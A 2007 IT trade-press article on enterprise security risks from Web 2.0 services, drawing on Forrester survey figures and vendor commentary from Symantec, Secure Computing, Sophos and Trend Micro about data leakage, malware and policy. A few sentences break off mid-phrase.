The trouble with the big new corporate security threat is that business is quickly becoming hooked on something it knows isn’t good for it. Like a dieter with a penchant for rich desserts, business is starting to realise all those sweets could be the cause of the problem – it just doesn’t have the self-control to completely cut out the chocolate.
Web 2.0 is popular and getting more so. Like many technology trends in the Internet age, consumers are leading the charge in a take up of complex interactive Web-based services and solutions that business is just not prepared for. Yet business is getting increasingly hooked on the collaborative, productivity-enhancing services delivered over the Internet – not only for their own use, but for their customers as well.
Ours is an increasingly self-service culture said David Dzienciol of Symantec. “People really want to take advantage of this. We are starting to find a self-service environment and business applications are increasingly being provided on a self-service basis. That is part of what we see as the problem as it leads to the threat of data leakage. How do we prevent that leakage?” he asks.
For many reasons we’ll look at more closely soon, data leakage is perhaps the most threatening of a myriad of Web 2.0 threats brought on by what security companies are describing as a blurring of the network edge. That perimeter boundary that once formed the first line of defence against Web 1.0 threats has been broken down from the inside as users eagerly gobble up the delights of a Web 2.0 world that tempts it with rich media, interactive features and user-generated content mashed up with sensitive enterprise data.
“We have seen a change in the Internet and the environment,” says Dzienciol, “particularly in the ways people are connecting and their usage patterns online – both as a consumer and in the enterprise.” Web 2.0, he says, “crosses the boundary.”
The attraction and at the same time the problem, with Web 2.0 is that it has significantly changed the type of traffic over the Web interface, where once websites consisted mainly of brochureware and were simple HTML pages containing text and images, today’s website is an infinitely more interactive space where users access applications and exchange data. This change in emphasis has opened up new attack vectors and created both inbound and outbound security threats which have not adequately been addressed by the types of security employed by organisations in the Web 1.0 world.
This second generation of Web technologies encompass a wide range of interactive activities that actually aim to promote collaboration and sharing of data between Web users and between Web services. On the one hand the adoption of Web 2.0 has fostered innovative new businesses and helped companies drive a new generation of productivity through collaboration and improved access to information. On the other, the very nature of Web 2.0 services tempts business to let down its defences a little and do things it never would have before, like allow applications written by an unknown source to run on its desktops, either in a browser or downloaded and installed locally. This sort of activity is becoming a regular practice that might have seemed unthinkable just a few short years ago.
Even where IT administrators have been alarmed at the potential threats and are even reporting significant negative impacts from these new threat vectors introduced by the Interactive Web, they have been largely unarmed – administratively and technically unprepared to deploy adequate counter measures to protect corporate IT assets.
At least initially it has been left to innovative security companies to move into the breach devising new approaches to security that can adequately deal with the new threats. As these approaches have proved effective, larger security providers who traditionally led the way with signature scanning solutions have also begun to adopt these strategies, techniques and technologies to augment their traditional approach with new tools that better deal with the blended threats encountered in today’s computing environments.
What is becoming more clear, as the threat explosion continues to wreak havoc in the Enterprise space, is that technology solutions alone will not suffice. Better policy and policy enforcement is now being brought to the forefront and a higher level of end user education and awareness is being advised as a necessary compensation for the freedoms Web 2.0 and broadband access brings them via their browser.
Eric Krieger, Australian Country Manager at Secure Computing, said that while most enterprises understand the need to look at risk mitigation, they are struggling to maintain a balance of control over the way users use the Web and business imperative to allow them to use it. The desire for business to take advantage of Web 2.0 services is not properly balanced by technology solutions that are able to protect it, he added. According to a Forrester Consulting report recently commissioned by Secure Computing, the Enterprise needs to not only update its risk awareness and the tools it uses to protect itself, it must also review its policy framework and take a more structured and proactive approach to end user education in order to help minimise the risk.
The Forrester study canvassed the opinions of 153 IT and security professionals from larger US organisations and found that while Web 2.0 use is already prevalent, the security measures in place to protect companies is inadequate and in many places demonstrably failing.
Forrester makes the point that the traditional boundary of external versus internal is quickly disappearing in the new Web world, leaving behind the policies, risk awareness and user training organisations found were adequate when dealing with Web 1.0.
The study found that many of the respondents were actively using Web 2.0 sites with 62 percent finding Webmail and content sharing platforms useful with 49 percent rating rich interactive applications and real-time communication at the same level. However, they are clearly experiencing problems from threats such as viruses, Trojans, and spyware with 47 percent reporting that viruses caused significant problems and 42 percent also citing Trojan’s. Nearly a quarter (21 percent) admit their organisation has experienced “critical business disruption” from viruses and 16 percent reported the same from Trojan activity.
Given their obvious pain, it is surprising to see a discrepancy between how prepared businesses perceive themselves to be and how prepared they actually are to deal with these threats, said Forrester. Nearly 97 percent consider themselves prepared for Web-borne threats, with only 68 percent conceding room for improvement. Those figures are despite 79 percent reporting ‘more than infrequent’ occurrences of Malware and more than 46 percent of them admitting they had spent over US$25,000 in the last fiscal year cleaning up after a Malware infestation.
The report further found that approximately 75 percent are using URL filtering and signature scanning at the gateway with only 37 percent deploying any form of heuristics-based detection. Still fewer (26 percent) are currently using behavioural analysis to detect zero-
Traditional filtering mechanisms are proving to be ineffective, argued Forrester, with the respondents backing the assertion to the tune of 56 percent stating that it does not catch all instances of Malware and 30 percent saying currently employed filtering technologies do not protect users from phishing.
So while 75 percent of large enterprises have deployed URL filtering and signature scanning at the edge and found it ineffective, smaller companies are even further behind this curve, seriously exposing their operations to outside attack. The transference of so many business transactions on to the Web has significantly increased the financial rewards for cybercriminals and consequently, the sophistication and coordination of Web-borne attacks has risen accordingly to take advantage of this low-lying fruit. Yet even larger organisations, which have the luxury of established security teams have deployed what are now considered only Web 1.0 defences against an emerging Malware plague seems to propagate
Blended attacks employing techniques such as Cross Site Scripting and even Cross Site Request Forgery, make the traditional URL filtering techniques inadequate because even ‘trusted’ sites can quickly become a launching pad for attack as has been demonstrated by some high profile cases (Facebook and Monster.com) in the past year.
With an increasing prevalence of Zero Day attacks, even signature scanning, long a stable in the Security diet are no longer an adequate means of protection on their own. The only hope to catch these attacks, suggests Forrester, is to employ “on-the-fly”, dynamic detection capabilities such as behavioural and heuristics-based detection. Without that, many attacks will go undetected, he warns.
Forrester goes further and suggests that traditional filtering technologies must be updated to handle the new Web 2.0 reality with reputation services, content filtering, blended threat protection, heuristics, and behaviour-based detection are all part of a new regime required to mitigate attack vectors, which are quickly becoming commonplace.
This filtering of all channels is imperative because of the blended nature of today’s threats. Increasingly, security administrators are faced with a situation where one threat spawns another to deliver Malware payloads by leveraging weakness in multiple channels such as spam leading to adware, which in turn ultimately leads to a phishing attack.
“One of the things we have found essential is the need for real-time reputation-based Web and message filtering, which can intercept and evaluate Web traffic even before it hits the network gateway, coupled with real-time anti-Malware protection from Internet-based sources,” explains Kreiger, whose company secures the majority of the Dow Jones Gobal top 50 companies.
In particular, Kregier reiterates Forrester’s advice to deploy reputation-based Web filtering. The company’s TrustedSource solution monitors Web activity and checks for IP address reputation in real-time by visiting one of five company maintained repositories, which in turn monitor IP address reputations by applying a 180 point Bayesian and Heuristic analysis to determine the reputation of each particular address.
This level of monitoring is necessary to combat a situation where research shows that on average, one in 10 websites host some form of Malware. New breached sites hosting Malware emerge every day often to disappear shortly after to help avoid detection and blacklisting. Without some form of near real-time website reputation, pre-classified URL lists simply cannot keep up with this fast-changing threat landscape, says Forrester.
In another survey, carried out by Enterprise security specialist Sophos, 80 percent of respondents confirmed they would like to block VoIP, IM, P2P traffic, games and distributed applications with nearly 80 percent saying it was “essential” they block P2P traffic. More than 60 percent said it was “essential” to block VoIP traffic. These security administrators are hampered by a cultural and business imperative to give more freedoms to end users who need to install and activate a wide variety of applications. Individually locking down user’s PCs has been shown to result in considerable cost to IT departments who must repeatedly intervene to help users access authorised applications, argues Sophos.
Zoe Nicholson, channel manager for Sophos in Australia said the downside to giving users administration rights is that increasingly Web-savvy users download and install applications such as IM, P2P and VoIP services to help them communicate and
Instant Messaging and peer to peer file sharing applications in particular have frequently shown to be the cause of Malware infection, consume scarce and costly network resources and sometimes act as time wasters that impact negatively on employee productivity. Similarly, 55 percent of Forrester’s respondents say that from 30 percent to more than 50 percent of their organisational bandwidth goes to rich media and social networking sites (eg. YouTube, MySpace, Facebook). 14 percent say these sites consume more than half of their available Web bandwidth.
Nicholson says the installation of unauthorised applications can pose significant legal and security risks. About half of workplace users download free Instant Messaging tools from the Internet, yet some 26 percent of employers aren’t even aware of their actions, she noted.
Toolbars and other desktop utilities can include user-generated widgets and applications to provide functionality. Often provided ‘as is’ with no warranty as to their safety, they can introduce significant security threats to the corporation.
“Organisations have to decide for themselves how strict they want to be in blocking potentially harmful Web-based services,” said Nicholson, but security companies need to provide easier ways to establish and implement policies that can block the download and installation of these applications.
Sophos’ approach is to build application control right into the end point anti-virus security system where it can be easily managed and administered. By doing the hard work and maintaining a list of blockable applications along with their signature files, Sophos enables policy based granularity that can quickly and cost effectively block one user group and not others, or allow access at different times of the day.
To get administrators started it also provides a free Application Discovery Tool to scan a network for applications it can control.
Going the other direction, you might be surprised to learn that while Forrester research discovered that 33 percent of respondents already “reported significant problems as a result of data leaks” and that in 18 percent or cases these leaks resulted in “critical business disruptions”; only 33 percent of respondents reported using any form of outbound content protection for their Web channel. Outbound scanning is designed to prevent Intellectual Property loss and to protect sensitive data types such as that covered by Privacy legislation. In fact, 58 percent of survey respondents expressed “extreme concern” about data leakage, rating the problem as high as viruses (57 percent) and Trojans (51 percent).
Many jurisdictions, including Australia, have legislative requirements that force organisations to take pro-active steps to prevent data leakage of privacy data, but the mismatch between business and legislative imperatives versus existing security measures indicates a business potential for resellers able to provide security consulting and solutions.
Symantec’s Dzienciol outlines the significant risks and costs to companies that suffer data breaches whether intentional or unintentional, through the loss of mobile computing equipment or through Web-based intrusion. The costs are not necessarily direct either. Costs incurred by companies that let data leak out are more likely to come from having to notify customers and the potential for loss of customer trust and public reputation as much as it is from having to restore data, he explains.
“From our perspective, Symantec really believes that data loss prevention has to be driven from a policy point of view. It cannot be solved by technology on its own. Companies need to understand what assets they have and how they intend to protect them.”
Essentially we have a number of solutions, it’s not about one product that does everything, he said. The endpoint protection solutions and network access control can help an organisation, but they need tools that can help them establish and implement a policy framework and administrative regime around data leakage.
Symantec Information Foundations 2007 is a suite of solutions that not only provides things like endpoint and network access security, but building on what Symantec calls its Security 2.0 strategy, it seeks to guard against data loss. With unified protection for email, Web and instant messaging – allowing for archiving and auditing of all information entering and leaving the enterprise – the solution is designed to support a process that can track and validate data movements ensuring proper “chains of custody”.
The solution begins with proper identification, classification and control of sensitive corporate data held in databases, emails, IM and file systems with ‘review’, ‘hold’, ‘release’ and ‘audit’ of Web-based communications and includes Beta-level support for outgoing filtering for Web communications.
The “chain of custody” imperative is driven out of recent changes in the US, which require enterprises to be able to produce information in the event of a lawsuit or investigation.
Speaking with security vendors it is clear that currently deployed technology solutions to the emerging Malware threat inherent in the rise of Web 2.0 programming is increasingly unable to manage the task and while security vendors are loath to admit any shortcomings in their security offerings, they are increasingly turning to additional forms of defence and are enthusiastically urging companies to take further non-technical steps to combat the threat.
Clearly, the Ad Hoc user training and security policy frameworks uncovered by researchers (48 percent of those Forrester surveyed indicated they undertook only Ad Hoc training and 12 percent seem to do none) are inadequate for the new Web 2.0 world order. While Forrester recommends the adoption of more advanced forms of Web filtering, which add site reputation, real-time behavioural analysis and heuristic threat detection, they also strongly advise companies to re-visit staff training and security policy enforcement.
Trend Micro’s Biviano, stresses the need for organisations to re-think policy. “Policy is always the first step and it needs to be said that policy hasn’t caught up with the latest web threat,” says Biviano adding that typically smaller organisations have avoided this part of the process and may struggle if they don’t know where to turn to.
This fact alone represents a potential business opportunities for resellers and solution providers with even a base level skill set in security. Along with end user training resellers and consultants can assist their clients by pro-actively encouraging them to undertake awareness training so that security-aware users are less likely to fall foul to social engineering and other obvious forms of attacks.
Written by Adam Gosling
Taming the Web 2.0 beast
By Staff Writers on Oct 23, 2007 2:46PM